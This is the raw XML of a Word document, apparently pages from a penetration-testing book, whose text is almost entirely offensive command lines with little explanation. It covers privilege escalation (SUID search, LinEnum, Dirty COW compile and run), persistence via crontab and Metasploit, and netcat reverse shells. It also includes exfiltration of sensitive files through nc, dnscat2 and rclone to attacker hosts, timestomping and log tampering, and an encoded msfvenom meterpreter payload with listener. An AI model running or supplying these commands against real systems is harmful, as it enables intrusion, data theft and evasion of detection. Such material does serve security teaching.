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A5FD" w14:textId="539AEA37" w:rsidR="00F33FB2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find / -perm -4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79180F7A" w14:textId="2B16B0CF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2089C7D9" w14:textId="143D8623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./beRoot.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174F9CD2" w14:textId="643FEF4A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03CBE345" w14:textId="743B42A8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sfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FD0227" w14:textId="20791B52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6119EF08" w14:textId="2BA21D63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type:exploit platform:[target_platform] privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054E257A" w14:textId="220069E0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04EA84D4" w14:textId="44346DBF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type:exploit platform:linux privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A62FF58" w14:textId="32EAAD55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700871F7" w14:textId="360123AD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chmod +x LinEnum.sh ./LinEnum.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C2701F" w14:textId="77777777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273C17C9" w14:textId="12545205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systeminfo &gt; sysinfo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DB4DDA" w14:textId="43467B56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01F6759A" w14:textId="1C3BB263" w:rsidR="003A1F3C" w:rsidRDefault="003A1F3C" w:rsidP="003A1F3C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr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</w:rPr>
        <w:t>python windows-exploit-suggester.py -i sysinfo.txt -d 2023-09-05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39373278" w14:textId="1597E968" w:rsidR="003A1F3C" w:rsidRDefault="003A1F3C" w:rsidP="003A1F3C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE1FD04" w14:textId="16EE9100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gcc -pthread dirtyc0w.c -o dirtyc0w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593D674B" w14:textId="23B08E3A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474D02B7" w14:textId="37E0D440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./dirtyc0w target_filename payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473B5B2A" w14:textId="4B2531C6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6CF358C3" w14:textId="75965A74" w:rsidR="003A1F3C" w:rsidRDefault="003A1F3C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exploit/windows/local/persistence set SESSION [SessionID] run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24190DC0" w14:textId="70315118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2F00F776" w14:textId="35D0B8B7" w:rsidR="003A1F3C" w:rsidRDefault="003A1F3C" w:rsidP="003A1F3C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr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</w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234B0841" w14:textId="10887797" w:rsidR="003A1F3C" w:rsidRDefault="003A1F3C" w:rsidP="003A1F3C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E608464" w14:textId="09884124" w:rsidR="003A1F3C" w:rsidRDefault="003A1F3C" w:rsidP="003A1F3C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr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</w:rPr>
        <w:t>echo "Malicious activity executed at $(date)" &gt;&gt; /tmp/malicious_log.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B37B195" w14:textId="32A4811D" w:rsidR="003A1F3C" w:rsidRDefault="003A1F3C" w:rsidP="003A1F3C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BFC21D1" w14:textId="77777777" w:rsidR="003A1F3C" w:rsidRDefault="003A1F3C" w:rsidP="003A1F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nc -e /bin/bash 192.168.1.100 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFA0329" w14:textId="5E319CAA" w:rsidR="003A1F3C" w:rsidRDefault="0061608D" w:rsidP="003A1F3C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echo "* * * * * /path/to/malicious/script.sh" &gt;&gt; /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30540225" w14:textId="21E31DDC" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="003A1F3C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FD414A" w14:textId="17AF8C71" w:rsidR="0061608D" w:rsidRPr="003A1F3C" w:rsidRDefault="0061608D" w:rsidP="003A1F3C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/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</w:rPr>
        <w:t>psexec.py [Domain/]Username:Password@TargetIP cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A82D5F" w14:textId="5EE170FF" w:rsidR="003A1F3C" w:rsidRDefault="003A1F3C" w:rsidP="003A1F3C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09B8DE87" w14:textId="40EBDC7C" w:rsidR="003A1F3C" w:rsidRDefault="0061608D" w:rsidP="003A1F3C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nc -lvp 12345 &gt; stolen_data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33766A8C" w14:textId="60E24D1B" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="003A1F3C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B4F340" w14:textId="0206BF87" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="003A1F3C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nc [attacker's IP] 12345 &lt; /path/to/sensitive/file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE4168" w14:textId="6A5028CB" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="003A1F3C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2039E7D0" w14:textId="6A06ACDE" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="003A1F3C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>dnscat2 --listen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D22BF34" w14:textId="590DFFB6" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="0061608D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0917D072" w14:textId="0E5FEF1A" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="0061608D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dnscat2 [attacker's domain]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116463FB" w14:textId="535C5C1D" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1946ACC3" w14:textId="1C92B46B" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="0061608D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sed -i 's/original/modified/g' /path/to/file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43203314" w14:textId="455467AC" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521A106B" w14:textId="7F82043D" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>rclone copy /path/to/sensitive/data remote:target_directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E9A3BC" w14:textId="533B2DDA" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205AD3C5" w14:textId="577B02A8" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2521DBEC" w14:textId="149D8EF6" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>logrotate -f /etc/logrotate.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B823035" w14:textId="4C804DF9" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713C38DF" w14:textId="2FE6264F" w:rsidR="0061608D" w:rsidRDefault="0061608D" w:rsidP="0061608D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touch -a -m -t 202201011200.00 /path/to/file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5874A6" w14:textId="7B7FD6DF" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72632FA8" w14:textId="6228299A" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20913CE0" w14:textId="77777777" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="00A3228A">
      <w:pPr>
        <w:pStyle w:val="CodeBlockBPBHEB"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00F0343C">
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=4444 -f exe -e x86/shikata_ga_nai -i 5 &gt; payload.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D0F69A" w14:textId="12267E6F" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69CD150E" w14:textId="7BADA4C8" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C3F191" w14:textId="77777777" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="00A322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ncat --listen --keep-open --ssl 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79174A7F" w14:textId="77777777" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="00A322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the victim's machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D91F009" w14:textId="77777777" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="00A322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ncat --ssl [attacker's IP] 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F977FAC" w14:textId="5FC1BD0F" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="0061608D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lastRenderedPageBreak/>
        <w:t>use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [Your IP] set LPORT 4444 run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267EC25D" w14:textId="67F3426C" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BB6E2E" w14:textId="77777777" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="00A322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dnscat2 --listen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727E9A66" w14:textId="77777777" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="00A322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the victim's machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF62407" w14:textId="77777777" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="00A3228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dnscat2 [attacker's domain]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4824DD" w14:textId="66D10CD0" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE57388" w14:textId="098E1ECC" w:rsidR="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C402B49" w14:textId="621C2946" w:rsidR="00A3228A" w:rsidRPr="00A3228A" w:rsidRDefault="00A3228A" w:rsidP="0061608D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>uselistener http set Host http:/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>/[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Your IP] run</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A3228A" w:rsidRPr="00A3228A" w:rsidSect="00657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3C"/>
    <w:rsid w:val="003A1F3C"/>
    <w:rsid w:val="005415EA"/>
    <w:rsid w:val="005F23E0"/>
    <w:rsid w:val="0061608D"/>
    <w:rsid w:val="00657E0B"/>
    <w:rsid w:val="008B0D5F"/>
    <w:rsid w:val="00A3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961F7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{82752A53-B87E-494A-B266-664CFB6E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F3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BlockBPBHEB">
    <w:name w:val="Code Block [BPB HEB]"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeBlockBPBHEBChar"/>
    <w:qFormat/>
    <w:rsid w:val="00A3228A"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:bidi w:val="0"/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BPBHEBChar">
    <w:name w:val="Code Block [BPB HEB] Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CodeBlockBPBHEB"/>
    <w:rsid w:val="00A3228A"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Arial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reda</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>eman reda</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-22T16:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-22T17:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>